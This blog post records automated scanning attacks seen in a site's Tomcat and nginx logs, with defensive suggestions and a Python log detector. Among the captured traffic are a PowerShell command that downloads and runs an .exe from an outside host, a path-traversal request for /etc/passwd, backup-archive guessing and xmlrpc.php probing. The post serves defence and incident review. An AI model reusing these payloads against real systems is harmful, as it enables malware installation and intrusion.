Several errors seen in the Java backend of a web project, probably caused by automated scanning attacks

Author: admin  Category: Exception handling  Published: 2021-01-15 17:17  Views: 1,817

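The following are several things the Java application's endpoints ran into when site traffic was around 200 to 300 IPs.

Recording them here for now. Some bots send probing attacks based on the request URLs.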

INFO: Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:414)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:294)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:834)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1415)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)


Dec 17, 2020 9:09:33 AM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [mail[#markup]] with value [ powershell (new-object System.Net.WebClient).DownloadFile('http://UeR.ReiyKiQ.ir/download.exe','%SystemRoot%/Temp/ccafkbgexipttxx2042.exe');start %SystemRoot%/Temp/ccafkbgexipttxx2042.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.

https://zhuanlan.zhihu.com/p/169516857

Attack attempting to exploit a directory traversal vulnerability

2020-12-22 12:52:34,944  WARN ResourceHttpRequestHandler:649 - Path contains "../" after call to StringUtils#cleanPath: [foo/default/master/../../../../../../../etc/passwd]

Attack using special characters entered in the address bar

INFO: Error parsing HTTP request header
 Note: further occurrences of HTTP request parsing errors will be logged at DEBUG level.
java.lang.IllegalArgumentException: Invalid character found in method name. HTTP method names must be tokens
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:414)
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:294)
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:834)
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1415)
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
    at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
    at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
    at java.lang.Thread.run(Thread.java:748)

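Note from 20210209: looking at the nginx log, I found that every day some IP scans the site root directory. It guesses archive file names based on the domain name, so pay attention to how backup files are named and where they are stored.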

45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www.oxoxox.net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:23 +0800] "HEAD /www_oxoxox_net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /wwwoxoxoxnet.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxox.net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxox_net.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:24 +0800] "HEAD /oxoxoxnet.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /oxoxox.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:25 +0800] "HEAD /www.oxoxox.net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /www_oxoxox_net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /wwwoxoxoxnet.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /oxoxox.net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:26 +0800] "HEAD /oxoxox_net.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /oxoxoxnet.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /oxoxox.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www.oxoxox.net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:27 +0800] "HEAD /www_oxoxox_net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /wwwoxoxoxnet.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxox.net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxox_net.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:28 +0800] "HEAD /oxoxoxnet.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /oxoxox.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.zip HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:29 +0800] "HEAD /wwwroot.tar.gz HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:30 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "-"
45.121.104.188 - - [09/Feb/2021:13:47:30 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "-"

On 20210219, while looking at the access log, I found the following. This is probing through WordPress's xmlrpc.php without logging in.

47.244.235.248 - - [18/Feb/2021:18:26:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:15 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:16 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:17 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:18 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:19 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:26:20 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"

...back 1 page
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:52 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:54 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:57 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"
47.244.235.248 - - [18/Feb/2021:18:25:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 414 "https://www.xxxx.net/xmlrpc.php" "python-requests/2.22.0"

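Searching online turned up several ways to handle this:

  1. Ban the IP, but most of them come from IP proxy pools, so you can never ban them all
  2. Delete the xmlrpc.php file (if you are not familiar with WordPress, you do not know what effect deleting it will have)
  3. Block the request in the nginx configuration file:

     location = /xmlrpc.php {
         deny all;
     }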
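
An added example (not part of the original post): a small Python pass over nginx access-log lines that flags the two patterns logged above, root-level archive-name guessing and repeated POSTs to /xmlrpc.php, and separately reports any archive-style request that was answered with something other than 404. The thresholds, finding names and sample lines are assumptions constructed for illustration; counts are taken over whatever lines are passed in, for example one day's log.

```python
import re
from collections import defaultdict

# nginx "combined" access-log format, same shape as the lines quoted above
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# A single file in the web root whose name ends in an archive/backup extension
ARCHIVE_RE = re.compile(r'^/[^/]+\.(rar|zip|tar\.gz|tgz|7z|bak|sql)$', re.I)

def detect(lines, min_archive_names=5, min_xmlrpc_posts=5):
    """Return sorted (ip, finding, detail) tuples for the input lines."""
    names = defaultdict(set)     # ip -> distinct archive names requested
    exposed = defaultdict(set)   # ip -> archive names answered with non-404
    posts = defaultdict(int)     # ip -> number of POST /xmlrpc.php
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue             # not a parseable request line
        ip, method, target, status = m.groups()
        path = target.split('?', 1)[0]
        if ARCHIVE_RE.match(path):
            names[ip].add(path)
            if status != '404':
                exposed[ip].add(path)
        elif method == 'POST' and path == '/xmlrpc.php':
            posts[ip] += 1
    findings = []
    for ip, seen in names.items():
        if len(seen) >= min_archive_names:
            findings.append((ip, 'archive-guessing', len(seen)))
    for ip, seen in exposed.items():
        # Highest priority: a backup-style file is actually being served
        findings.append((ip, 'archive-served', sorted(seen)))
    for ip, count in posts.items():
        if count >= min_xmlrpc_posts:
            findings.append((ip, 'xmlrpc-burst', count))
    return sorted(findings, key=lambda f: (f[0], f[1]))

# Constructed sample (documentation IPs and example.com, not real traffic)
def _line(ip, method, path, status, ua='-'):
    return f'{ip} - - [09/Feb/2021:13:47:23 +0800] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'

SAMPLE = (
    [_line('203.0.113.7', 'HEAD', f'/{n}.{e}', 404)
     for n in ('www', 'example.com', 'wwwroot') for e in ('rar', 'zip')]
    + [_line('203.0.113.7', 'HEAD', '/example.com.tar.gz', 200)]
    + [_line('198.51.100.9', 'POST', '/xmlrpc.php', 200, 'python-requests/2.22.0')] * 6
    + [_line('192.0.2.4', 'GET', '/downloads/manual.zip', 200, 'Mozilla/5.0')]
)

if __name__ == '__main__':
    for finding in detect(SAMPLE):
        print(finding)
```

An `archive-served` finding is the one to act on first: it means a file matching the guessed naming scheme exists under the web root.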
